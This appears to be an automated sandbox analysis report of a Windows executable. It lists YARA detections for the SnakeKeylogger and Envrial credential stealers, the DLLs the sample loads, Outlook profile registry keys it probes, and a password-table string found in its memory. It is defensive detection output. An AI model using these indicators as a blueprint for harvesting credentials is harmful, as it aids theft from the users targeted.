                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22df9be.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.4105228422.0000000002710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: Process Memory Space: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe PID: 7288, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.22e08de.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2710000.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.3.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.6cba98.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe.2510f20.4.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.winEXE@1/0@4/4
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeMutant created: NULL
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCommand line argument: 08A0_2_00413780
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4105270997.0000000002C01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeReversingLabs: Detection: 50%
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: _.pdb source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104931706.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000003.1649899413.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exe, 00000000.00000002.4104801390.000000000229F000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                Source: 173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeStatic PE information: real checksum: 0x23bfb should be: 0x38063
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_3_05D81595 push es; ret 0_3_05D81598
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_3_05D7F598 push es; ret 0_3_05D7F5B8
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_3_05D872D2 push eax; ret 0_3_05D872F1
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_3_05D872F2 push 7406A1C3h; ret 0_3_05D872FD
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0040E21D push ecx; ret 0_2_0040E230
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0040BB97 push dword ptr [ecx-75h]; iretd 0_2_0040BBA3
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0219E558 push eax; iretd 0_2_0219E559
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_061CC4EA push es; iretd 0_2_061CC4FC
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_0642FB1E push es; ret 0_2_0642FB20
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064ADBA0 push es; ret 0_2_064ADBB0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_064ADBB8 push es; ret 0_2_064ADBB0
                Source: C:\Users\user\Desktop\173127133603e75602cf90c03b229cc07ec4f5c026cad2909c809b767b293bf800a0e9ade9674.dat-decoded.exeCode function: 0_2_06F8922F push es; ret 0_2_06F89240
